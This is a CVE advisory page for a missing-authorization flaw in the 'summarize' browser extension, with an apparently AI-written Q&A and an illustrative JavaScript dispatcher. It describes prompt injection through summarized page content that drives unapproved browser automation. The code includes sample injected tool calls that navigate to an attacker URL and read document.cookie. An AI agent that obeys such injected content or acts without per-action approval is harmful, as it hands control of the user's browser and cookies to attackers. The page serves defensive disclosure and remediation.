CVE-2026-45244
Summarize Prior Extension Automation Authorization Bypass
Publication date: 2026-05-18
Last updated on: 2026-05-19
Assigner: VulnCheck
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| steipete | summarize | all versions before 0.15.1 (0.15.1 itself is not affected) |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-862 | Missing Authorization: the product does not perform an authorization check when an actor attempts to access a resource or perform an action. |
AI Powered Q&A
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided information does not explicitly address how CVE-2026-45244 affects compliance with common standards and regulations such as GDPR or HIPAA.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
The vulnerability is the execution of browser automation actions without a per-call user approval when the extension's automation feature is enabled. The most reliable check is therefore the installed version: any Summarize build before 0.15.1 with automation enabled is affected, and the version shown on the browser's extension management page settles the question without any further analysis.
Beyond the version check, look for automation tool invocations (navigation, debugger-backed actions) that the user did not initiate. Exploitation is driven by attacker-controlled page or summary content, so the relevant evidence lives in the extension's own logs and in the browser's record of automation activity rather than on the network: the actions are carried out by the user's own browser, so network traffic alone does not distinguish them from ordinary browsing.
No specific commands or detection tools are provided in the available resources.
What immediate steps should I take to mitigate this vulnerability?
To mitigate this vulnerability, upgrade the Summarize extension to version 0.15.1 or later, where the missing authorization issue has been fixed.
The fix introduces an explicit user confirmation prompt before executing any automation tool calls, preventing unauthorized or unexpected browser automation.
- Update the Summarize extension to version 0.15.1 or newer.
- If the upgrade cannot be applied immediately, disable the extension's automation feature; the vulnerability is only reachable while that feature is enabled. Where it must stay on, make sure users understand that any page or summary content the agent reads can attempt to drive it.
- After upgrading, verify that the extension prompts for confirmation before each automation action, not merely once when the feature is turned on.
How can this vulnerability impact me?
This vulnerability can allow attackers to perform automated browser actions on behalf of the user without the user's explicit consent for each action. Because the trigger is content the agent reads (a web page being summarized, or injected summary text), simply having the extension process attacker-controlled content can lead to unauthorized navigation, page manipulation, or debugger-backed actions within the browser.
Such actions compromise user security and privacy: whoever controls the content the agent processes effectively controls what the browser does next.
Can you explain this vulnerability to me?
The vulnerability exists in Summarize versions prior to 0.15.1 and is a missing authorization check (CWE-862). When the extension's automation feature is enabled, the agent's tool calls are executed without the user approving each individual action.
An attacker who controls the content the agent processes (a malicious web page being summarized, or injected summary text) can steer it into invoking any enabled automation tool, such as navigation or debugger-backed actions. The user's only interaction is viewing or summarizing that content; the per-action approval step that should stand between the model's output and a side-effecting browser action was absent, so the attacker's instructions run with the user's browser privileges. Version 0.15.1 closes the gap by requiring an explicit user confirmation before any automation tool call is executed.
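The following is an added example written for this page, not the Summarize extension's source, to make the CWE-862 pattern described above and the per-call confirmation fix described under mitigation concrete. It models an LLM-driven automation feature as a tool-call dispatcher: a vulnerable form whose only check is the feature flag, beside a hardened form that requires an explicit approval decision for each individual call and fails closed. The tool calls, tool names (`navigate`, `debugger.evaluate`), registry stubs and function names are all hypothetical; the registry only logs what a real extension would perform via browser APIs.

```javascript
// Added example for this page: a minimal tool-call dispatcher for an
// LLM-driven browser-automation feature, in a vulnerable form (the CWE-862
// pattern in the advisory) and a hardened form (per-call user authorization).
// Illustrative code, NOT the Summarize extension's source; every name here
// (dispatchVulnerable, dispatchHardened, makeRegistry, ...) is hypothetical.

// Constructed model output: tool calls an agent emitted after summarizing
// attacker-controlled page content that carried a prompt-injection payload.
const INJECTED_TOOL_CALLS = [
  { tool: "navigate", args: { url: "https://attacker.example/collect" } },
  { tool: "debugger.evaluate", args: { expression: "document.cookie" } },
  { tool: "filesystem.write", args: { path: "/tmp/x" } }, // not a registered tool
];

// Constructed registry of side-effecting tools. Real implementations would
// call browser extension APIs (tab navigation, debugger commands); these only
// append to `log` so the example runs offline.
function makeRegistry(log) {
  return {
    navigate: ({ url }) => { log.push(`navigate ${url}`); return "navigated"; },
    "debugger.evaluate": ({ expression }) => { log.push(`evaluate ${expression}`); return "evaluated"; },
  };
}

// VULNERABLE: the only check is the feature flag. Once automation is enabled,
// every registered tool the model names is executed, so whoever controls the
// content the model reads effectively controls the browser.
function dispatchVulnerable(calls, registry, settings) {
  const results = [];
  if (!settings.automationEnabled) return results;
  for (const call of calls) {
    const impl = registry[call.tool];
    if (impl) results.push(impl(call.args));
  }
  return results;
}

// HARDENED: each individual call needs its own authorization decision.
// `approve(call)` stands in for the confirmation prompt (synchronous here to
// keep the example simple; real extension UI would be asynchronous). Anything
// not approved with a literal `true`, and any unregistered tool, is refused.
function dispatchHardened(calls, registry, settings, approve) {
  const results = [];
  if (!settings.automationEnabled) return results;
  for (const call of calls) {
    const impl = registry[call.tool];
    if (!impl) {
      results.push({ tool: call.tool, status: "rejected", reason: "unregistered tool" });
      continue;
    }
    if (approve(call) !== true) {
      results.push({ tool: call.tool, status: "denied" });
      continue;
    }
    results.push({ tool: call.tool, status: "executed", result: impl(call.args) });
  }
  return results;
}

// Approval policy for the demo: the user confirms the navigation but refuses
// the debugger-backed action. A real prompt would show tool name and arguments
// so the user can see exactly what the model is asking to do.
function demoApprover(call) {
  return call.tool === "navigate";
}

// Runs both dispatchers on the injected calls and returns what each executed,
// plus the hardened dispatcher's per-call decision record (useful audit data).
function runDemo() {
  const settings = { automationEnabled: true };
  const vulnLog = [];
  dispatchVulnerable(INJECTED_TOOL_CALLS, makeRegistry(vulnLog), settings);
  const hardLog = [];
  const decisions = dispatchHardened(INJECTED_TOOL_CALLS, makeRegistry(hardLog), settings, demoApprover);
  return { vulnLog, hardLog, decisions };
}

console.log(JSON.stringify(runDemo(), null, 2));
```

With automation enabled, the vulnerable dispatcher performs both the navigation and the cookie-reading debugger call purely because the model emitted them; the hardened one performs only the navigation the user approved, denies the debugger call, and rejects the unknown tool. The decision record it returns is also what a practitioner would want logged when answering the detection question above, since it ties every side-effecting action to an explicit approval.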